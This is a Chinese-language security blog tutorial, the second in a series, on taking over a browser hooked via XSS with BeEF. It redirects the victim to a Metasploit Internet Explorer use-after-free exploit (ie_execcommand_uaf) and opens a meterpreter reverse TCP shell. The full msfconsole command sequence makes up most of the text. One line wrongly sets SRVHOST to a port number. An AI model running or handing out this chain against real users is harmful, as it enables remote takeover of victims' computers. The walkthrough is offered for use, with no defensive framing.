最新消息:

Xss漏洞之Kali下的完美利用(二)

Kali Linux Eternal 6210浏览 0评论

上篇文章我们利用了 ms10-002 的这个 Exploit ,但目前来说它的利用率已经非常低了。因为它的 target 为IE6.0及以下的版本,只要用户按常规升级补丁,基本就很难利用到!今天,继续为大家介绍另一个IE的Exploit 。该EXP可利用的范围相对广些,支持6.0及7,8,9三个IE版本!

关于beef的开启操作就直接忽略了,参考上篇文章 http://www.secist.com/archives/669.html

首先,我们打开msfconsole并使用EXP模块:

use exploit/windows/browser/ie_execcommand_uaf

show options 查看配置项

20160818102602

配置模块基本信息:

set SRVHOST 192.168.80.136

set SRVHOST 8888

set URIPATH /

20160818102702

设置会话处理程序:

set PAYLOAD windows/meterpreter/reverse_tcp

开始利用:

exploit

20160818102900

做好 MSF上配置后,我们只需要对被 beef 所 hook 的目标进行URL的跳转处理即可!跳转到我们 MSF 伪造的一个URL上:

http://192.168.80.136:8888

20160818103044

当目标成功跳转至我们指定的URL地址后,我们就可以在MSF控制台取得目标的 meterpreter reverse_tcp sessions !

20160818103154

利用命令:

sessions -i 1

成功建立会话!

转载请注明:即刻安全 » Xss漏洞之Kali下的完美利用(二)

您必须 登录 才能发表评论!



合作伙伴